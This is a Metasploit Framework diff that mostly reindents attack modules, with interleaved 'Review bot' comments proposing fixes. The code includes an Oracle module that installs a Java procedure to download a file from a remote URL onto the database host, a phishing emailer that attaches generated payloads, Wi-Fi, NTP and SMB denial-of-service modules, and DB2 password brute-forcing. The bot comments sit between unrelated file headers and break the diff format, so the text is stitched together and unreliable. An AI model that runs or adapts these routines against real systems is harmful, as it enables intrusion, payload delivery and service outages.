diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index 59bfcbc1ab..478c086c69 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -91,7 +91,7 @@ class Header ret << ",\n" if (@_csectFat) - ret << " _csectFat => 0x%08x" % @_csectFat + ret << " _csectFat => 0x%08x" % @_csectFat else ret << " _csectFat => UNALLOCATED" end diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 57c2cf5874..cb532f3d49 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -174,7 +174,7 @@ class Storage @header.write @fd write_user_data - # NOTE: we call write_stream here since we MUST write this to + # NOTE: we call write_stream here since we MUST write this to # the regular stream (regardless of size) ms_start = write_stream(@ministream) @directory.set_ministream_params(ms_start, @ministream.length) @@ -249,7 +249,7 @@ class Storage @directory.each_entry { |stm| # only regular streams this pass next if (stm.type != STGTY_STREAM) - + if (stm.length >= @header._ulMiniSectorCutoff) stm.start_sector = write_stream(stm) else diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 754f84eb8f..fb7d3a5fac 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'References' => [ - [ 'OSVDB', '17627' ], + [ 'OSVDB', '17627' ], [ 'CVE', '2005-0771' ], [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'], ], @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return { "regread" => "Read a registry value", # "regenum" => "Enumerate registry keys", - } + } end def run diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index ab7ad11957..099dde236e 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb 
+++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/admin/j_security_check', 'method' => 'POST', - 'content-type' => 'application/x-www-form-urlencoded', + 'content-type' => 'application/x-www-form-urlencoded', 'cookie' => "JSESSIONID=#{jsessionid}", 'data' => post_data, }, 25) diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 49930b9329..bbb9e82650 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -88,6 +88,7 @@ class Metasploit3 < Msf::Auxiliary end end + =begin /* * IDL code generated by mIDA v1.0.8 diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 37f3b46e80..8559b4a610 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb 
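Review bot: The reindented `'content-type'` key in the `send_request_cgi` options hash does not match the key the other HTTP modules in this same changeset use for the same purpose — `blind_sql_query.rb` and `error_sql_injection.rb` pass `'ctype' => 'application/x-www-form-urlencoded'` — so if the HTTP client only honors `'ctype'` (not verifiable from this hunk), this entry is silently ignored and the Content-Type sent with `post_data` depends on the client's default. Changing the line to `'ctype' => 'application/x-www-form-urlencoded',` makes the intent explicit and consistent with the rest of the tree. The enclosing method starts before the hunk.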
@@ -41,34 +41,36 @@ class Metasploit3 < Msf::Auxiliary def run return if not check_dependencies - java = " - CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS - import java.lang.*; - import java.io.*; - public class FileUpload - { - public static void fileUpload(String myFile, String url) throws IOException - { - File binaryFile = new File(myFile); - FileOutputStream outStream = new FileOutputStream(binaryFile); - java.net.URL u = new java.net.URL(url); - java.net.URLConnection uc = u.openConnection(); - InputStream is = (InputStream)uc.getInputStream(); - BufferedReader in = new BufferedReader (new InputStreamReader (is)); - byte buffer[] = new byte[1024]; - int length = -1; - while ((length = is.read(buffer)) != -1) { + java = <<-EOF +CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS +import java.lang.*; +import java.io.*; +public class FileUpload +{ + public static void fileUpload(String myFile, String url) throws IOException + { + File binaryFile = new File(myFile); + FileOutputStream outStream = new FileOutputStream(binaryFile); + java.net.URL u = new java.net.URL(url); + java.net.URLConnection uc = u.openConnection(); + InputStream is = (InputStream)uc.getInputStream(); + BufferedReader in = new BufferedReader (new InputStreamReader (is)); + byte buffer[] = new byte[1024]; + int length = -1; + while ((length = is.read(buffer)) != -1) { outStream.write(buffer, 0, length); - outStream.flush(); } - is.close(); outStream.close(); - } };; - " + outStream.flush(); + } + is.close(); outStream.close(); + } +};; +EOF - procedure = " - CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2) - as language java - NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; - " + procedure = <<-EOF +CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2) +as language java +NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; +EOF exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', 
'#{datastore['URL']}'); end;" diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 1e82d7244e..4e4ba07643 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], [ 'URL' , 'http://www.red-database-security.com/scripts/sid.txt' ], @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get_once(-1,3) disconnect - if ( res and res =~ /ERROR_STACK/ ) + if ( res and res =~ /ERROR_STACK/ ) '' else report_note( diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 364ae4cc19..ce4b0ea230 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -26,14 +26,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['MC'], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Feb 1 2009')) - - register_options( - [ - Opt::RPORT(1521), - OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), - ], self.class) + 'DisclosureDate' => 'Feb 1 2009' + )) + register_options( + [ + Opt::RPORT(1521), + OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), + ], self.class) end def run diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index c6f1bc6ef8..f210c3798d 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb 
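Review bot: The `exec` line at the end of the hunk still builds the PL/SQL call by interpolating `datastore['COPYTO']` and `datastore['URL']` straight into single-quoted literals, so a `'` in either option (URLs with quotes are legal) breaks the anonymous block at runtime, and the heredoc rewrite does not address this. Doubling the quote before interpolation keeps the statement well-formed: `exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO'].gsub("'", "''")}', '#{datastore['URL'].gsub("'", "''")}'); end;"`. In the Java source, `is.close(); outStream.close();` only run when the copy loop completes, so an IOException from `read` or `write` leaves both handles open inside the database JVM; wrapping the loop in try/finally, and dropping the unused `BufferedReader in`, would tidy that. The `run` method continues past the hunk.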
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) + OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) ], self.class) deregister_options( 'SQL', 'RETURN_ROWSET' ) diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index 04858afc3e..39cc908a4f 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary "download" => "Download a file", "upload" => "Upload a file", "list" => "List files (not recommended - will crash the driver)", - } + } end def run diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index d9dec7f517..ebf3d96fc2 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary fd = simple.open("\\#{datastore['RPATH']}", 'rwct') fd.write(data) fd.close - + print_status("The file has been uploaded to #{datastore['RPATH']}...") end diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index a9a2129f78..092ba0e49c 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb 
@@ -67,15 +67,15 @@ class Metasploit3 < Msf::Auxiliary attachment_file_type = yamlconf['attachment_file_type'] attachment_file_name = yamlconf['attachment_file_name'] - ### payload options ### - make_payload = yamlconf['make_payload'] - zip_payload = yamlconf['zip_payload'] - msf_port = yamlconf['msf_port'] - msf_ip = yamlconf['msf_ip'] - msf_payload = yamlconf['msf_payload'] - msf_filename = yamlconf['msf_filename'] - msf_change_ext = yamlconf['msf_change_ext'] - msf_payload_ext = yamlconf['msf_payload_ext'] + ### payload options ### + make_payload = yamlconf['make_payload'] + zip_payload = yamlconf['zip_payload'] + msf_port = yamlconf['msf_port'] + msf_ip = yamlconf['msf_ip'] + msf_payload = yamlconf['msf_payload'] + msf_filename = yamlconf['msf_filename'] + msf_change_ext = yamlconf['msf_change_ext'] + msf_payload_ext = yamlconf['msf_payload_ext'] tmp = Dir.tmpdir @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary print_error("YAML config: #{type}") end - if make_payload + if make_payload attachment_file = File.join(tmp, msf_filename) attachment_file_name = msf_filename @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary attachment_file_type = 'application/exe' end - end + end File.open(fileto, 'rb').each do |l| diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 8d99f27e1c..b768ba249e 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. - Note, unless you control the spoofed source host or the real + Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun! }, 
diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 4ae9808aaf..995b6c4d99 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary print_status("Deleting #{datstore['RPATH']}...") if !( - send_file(sock1, 2, "cfA" + jid + r_hostname, control) and - send_file(sock1, 3, "dfa" + jid + r_hostname, dataf) - ) - sock1.close + send_file(sock1, 2, "cfA" + jid + r_hostname, control) and + send_file(sock1, 3, "dfa" + jid + r_hostname, dataf) + ) + sock1.close return end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 1a649cdc8b..aef212777d 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -80,6 +80,6 @@ class Metasploit3 < Msf::Auxiliary "\xff\x7f" + # Duration eton(datastore['ADDR_DST']) # dst addr - return frame + return frame end end diff --git a/modules/auxiliary/dos/wifi/daringphucball.rb b/modules/auxiliary/dos/wifi/daringphucball.rb index 32969e2338..b7e3ce44e3 100644 --- a/modules/auxiliary/dos/wifi/daringphucball.rb +++ b/modules/auxiliary/dos/wifi/daringphucball.rb 
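Review bot: The context line at the top of the cascade_delete hunk, `print_status("Deleting #{datstore['RPATH']}...")`, references `datstore`, which is never defined, so Ruby raises NameError there before either `send_file` call is reached and the module cannot run as written; the reindent leaves it untouched. It should read `print_status("Deleting #{datastore['RPATH']}...")`. The enclosing method starts before the hunk.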
@@ -94,19 +94,17 @@ Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: -0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 - 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 + Exception state (sv=0x3AA12A00) + PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) + Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314 + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AppleAirPort(3.4.4)@0x797000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 Proceeding back via exception chain: - Exception state (sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) + Exception state (sv=0x3AA12A00) + previously dumped as "Latest" state. skipping... + Exception state (sv=0x31F13A00) + PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) Kernel version: Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC 
@@ -116,20 +114,20 @@ Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj (gdb) showcurrentstacks task vm_map ipc_space #acts pid proc command 0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task - activation thread pri state wait_queue wait_event - 0x01a7c000 0x01a7c000 82 R - reserved_stack=0x173b0000 - kernel_stack=0x17440000 - stacktop=0x17443b60 - 0x17443b60 0x1bc80ac - 0x17443be0 0x7a1d48 - 0x17443c60 0x79fa54 - 0x17443ce0 0x79ff94 - 0x17443d90 0x79febc - 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> - 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> - 0x17443e90 0xa9314 - stackbottom=0x17443e90 +activation thread pri state wait_queue wait_event +0x01a7c000 0x01a7c000 82 R +reserved_stack=0x173b0000 +kernel_stack=0x17440000 +stacktop=0x17443b60 +0x17443b60 0x1bc80ac +0x17443be0 0x7a1d48 +0x17443c60 0x79fa54 +0x17443ce0 0x79ff94 +0x17443d90 0x79febc +0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> +0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> +0x17443e90 0xa9314 +stackbottom=0x17443e90 (gdb) x/3i $pc diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 92d56dbc10..b8f8b99b8b 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -20,14 +20,15 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireless DEAUTH Flooder', 'Description' => %q{ - This module sends 802.11 DEAUTH requests to a specific wireless peer, - using the specified source address and source BSSID. - }, + This module sends 802.11 DEAUTH requests to a specific wireless peer, + using the specified source address and source BSSID. + }, 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) + register_options( [ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), 
diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index a8c2ac4f6d..d468e0ceca 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -51,25 +51,25 @@ class Metasploit3 < Msf::Auxiliary def run - open_wifi + open_wifi - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 + stime = Time.now.to_i + rtime = datastore['RUNTIME'].to_i + count = 0 - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") - frame = create_probe_response() + frame = create_probe_response() - print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...") + print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - end + while (stime + rtime > Time.now.to_i) + wifi.write(frame) + select(nil, nil, nil, 0.10) if (count % 100 == 0) + count += 1 + end - print_status("Completed sending #{count} probe responses.") + print_status("Completed sending #{count} probe responses.") end def create_probe_response diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb index 410bdb8b9c..009185ea2f 100644 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel - "\x03" + "\x01" + channel.chr + "\x03" + "\x01" + channel.chr return frame diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 25a8e1443a..d239c5a24d 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb 
+++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary break end print_error("Exception occurred on interation #{i}") - print_error("Error: #{e.class} > #{e}") + print_error("Error: #{e.class} > #{e}") break end end diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 14eee312ee..8dc903403e 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -11,10 +11,10 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::SMB + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset', 'Description' => %q{ @@ -27,13 +27,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['MSB', 'MS09-001'], ['OSVDB', '48153'], ['CVE', '2008-4114'], ['BID', '31179'], - ])) + ] + ) + ) end diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index e7cfd719d8..099ccb3b9d 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -11,10 +11,10 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ 
diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index e8483499bd..395c791005 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -15,10 +15,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference', 'Description' => %q{ diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 9b6b18078d..4f15e2e3be 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -124,13 +124,13 @@ class Metasploit3 < Msf::Auxiliary if (startstage == 2) process_phase(2, "Fuzzing USER", 'USER ') - startstage += 1 + startstage += 1 end if (startstage == 3) process_phase(3, "Fuzzing PASS", 'PASS ', [ "USER " + datastore['USER'] + "\n" ]) - startstage += 1 + startstage += 1 end if (startstage == 4) @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary # Fuzz other commands, all command combinations in one session if startstage == 5 - print_status("[Phase 5] Fuzzing other commands - Part 2 - #{Time.now.localtime}") + print_status("[Phase 5] Fuzzing other commands - Part 2 - #{Time.now.localtime}") @commands.each do |cmd| ecount = 1 count = datastore['STARTSIZE'] 
@@ -172,8 +172,8 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Exception => e if (e.class.name == 'Rex::ConnectionRefused') or (e.class.name == 'EOFError') or (e.class.name == 'Errno::ECONNRESET') or (e.class.name == 'Errno::EPIPE') - print_status("Crash string : #{cmd} #{evilchr} x #{count}") - print_status("System does not respond - exiting now\n") + print_status("Crash string : #{cmd} #{evilchr} x #{count}") + print_status("System does not respond - exiting now\n") return end print_error("Error: #{e.class} #{e} #{e.backtrace}\n") diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index ef9695759e..de7f4c7832 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel - "\x03" + "\x01" + channel.chr + "\x03" + "\x01" + channel.chr 1.upto(ies) do |i| max = mtu - frame.length diff --git a/modules/auxiliary/gather/dns_enum.rb b/modules/auxiliary/gather/dns_enum.rb index ddd472903b..b260055a9e 100644 --- a/modules/auxiliary/gather/dns_enum.rb +++ b/modules/auxiliary/gather/dns_enum.rb @@ -17,16 +17,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Enumeration Module', - 'Description' => %q{ + 'Name' => 'DNS Enumeration Module', + 'Description' => %q{ This module can be used to enumerate various types of information about a domain from a specific DNS server. - }, - 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ + }, + 'Author' => [ 'Carlos Perez ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ ['CVE', '1999-0532'], ['OSVDB', '492'], ] diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index f962e1a8fb..5e8af55ded 100644 
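Review bot: `rescue ::Exception => e` in the last ftp_pre_post hunk also traps `::Interrupt`, so a Ctrl-C during a fuzzing run is reported through `print_error("Error: #{e.class} ...")` and, as far as the hunk shows, the run carries on instead of stopping; the reindent keeps this in place. The dcerpc auditor in this same changeset handles it with a preceding clause that re-raises, `rescue ::Interrupt` / `raise $!`, and those two lines ahead of the `::Exception` clause would give this module the same behaviour. The begin block and the loop around it start outside the hunk.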
--- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -31,22 +31,21 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) - register_options( - [ + register_options( + [ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), OptPath.new('USER_FILE', [ false, "File containing users, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), + File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) - end def run_host(ip) - each_user_pass { |user, pass| - do_login(user,pass,datastore['DATABASE']) - } + each_user_pass { |user, pass| + do_login(user,pass,datastore['DATABASE']) + } end def do_login(user=nil,pass=nil,db=nil) 
@@ -64,24 +63,25 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") return :abort end - disconnect - if info[:db_login_success] - print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") - # Report credentials - report_auth_info( - :host => rhost, - :port => rport, - :sname => "db2", - :user => "#{db}/#{user}", - :pass => pass, - :active => true + disconnect + + if info[:db_login_success] + print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") + # Report credentials + report_auth_info( + :host => rhost, + :port => rport, + :sname => "db2", + :user => "#{db}/#{user}", + :pass => pass, + :active => true ) - return :next_user - else - vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") - return :fail - end + return :next_user + else + vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") + return :fail + end end end diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 5deafc169d..b0c2a968fb 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb 
@@ -37,36 +37,38 @@ class Metasploit3 < Msf::Auxiliary begin - connect_udp + connect_udp udp_sock.put(pkt) res = udp_sock.read(1024).split(/\x00/) - if (res) - report_note( - :host => ip, - :proto => 'udp', - :port => datastore['RPORT'], - :type => 'SERVICE_INFO', - :data => res[2] + "_" + res[1] + if (res) + report_note( + :host => ip, + :proto => 'udp', + :port => datastore['RPORT'], + :type => 'SERVICE_INFO', + :data => res[2] + "_" + res[1] ) - report_service( - :host => ip, - :port => datastore['RPORT'], - :proto => 'udp', - :name => "ibm-db2", - :info => res[2] + "_" + res[1] + report_service( + :host => ip, + :port => datastore['RPORT'], + :proto => 'udp', + :name => "ibm-db2", + :info => res[2] + "_" + res[1] ) - print_status("Host #{ip} node name is " + res[2] + " with a product id of " + res[1] ) - else - print_error("Unable to determine version info for #{ip}") - end + print_status("Host #{ip} node name is " + res[2] + " with a product id of " + res[1] ) + else + print_error("Unable to determine version info for #{ip}") + end + + disconnect_udp - disconnect_udp rescue ::Rex::ConnectionError rescue ::Errno::EPIPE end + end end diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index f7ce6183e6..cd9371e972 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -301,7 +301,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - #print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") + #print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") end disconnect() end diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index d60172be6d..da5445909e 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb 
